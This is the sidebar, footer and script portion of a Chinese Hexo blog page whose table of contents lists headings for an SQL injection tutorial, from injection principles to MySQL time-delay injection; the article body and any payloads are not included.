        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Rardar</p>
              <p class="site-description motion-element" itemprop="description">八佰伴</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/yourname" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:yourname@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://plus.google.com/yourname" target="_blank" title="Google">
                      
                        <i class="fa fa-fw fa-google"></i>Google</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://vk.com/yourname" target="_blank" title="VK Group">
                      
                        <i class="fa fa-fw fa-vk"></i>VK Group</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://youtube.com/yourname" target="_blank" title="YouTube">
                      
                        <i class="fa fa-fw fa-youtube"></i>YouTube</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://blog.csdn.net/qq_29753475" target="_blank" title="CSDN">
                      
                        <i class="fa fa-fw fa-skype"></i>CSDN</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入影响"><span class="nav-number">1.</span> <span class="nav-text">SQL注入影响</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入简介"><span class="nav-number">2.</span> <span class="nav-text">SQL注入简介</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#注入原理"><span class="nav-number">3.</span> <span class="nav-text">注入原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#明确常见存在SQL注入网站链接形式"><span class="nav-number">4.</span> <span class="nav-text">明确常见存在SQL注入网站链接形式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#常见判断是否存在注入漏洞的方法"><span class="nav-number">5.</span> <span class="nav-text">常见判断是否存在注入漏洞的方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入参数类型判断"><span class="nav-number">6.</span> <span class="nav-text">SQL注入参数类型判断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#判断常见数据库类型"><span class="nav-number">7.</span> <span class="nav-text">判断常见数据库类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#认识SQL注入类型"><span class="nav-number">8.</span> <span class="nav-text">认识SQL注入类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入常用函数及注入语句"><span class="nav-number">9.</span> <span class="nav-text">SQL注入常用函数及注入语句</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL盲注"><span class="nav-number">10.</span> <span class="nav-text">SQL盲注</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql-mid-函数"><span class="nav-number">11.</span> <span class="nav-text">sql mid 函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入危害"><span class="nav-number">12.</span> <span class="nav-text">SQL注入危害</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql-注入分类"><span class="nav-number">13.</span> <span class="nav-text">sql 注入分类</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql-注入的位置"><span class="nav-number">14.</span> <span class="nav-text">sql 注入的位置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sql注入判断依据"><span class="nav-number">15.</span> <span class="nav-text">sql注入判断依据</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#测试语句"><span class="nav-number">16.</span> <span class="nav-text">测试语句</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#数据库注释"><span class="nav-number">17.</span> <span class="nav-text">数据库注释</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MYSQL延迟注入"><span class="nav-number">18.</span> <span class="nav-text">MYSQL延迟注入</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Rardar</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span> | 
</span>
</div>

<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共8.2k字</span>
</div>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>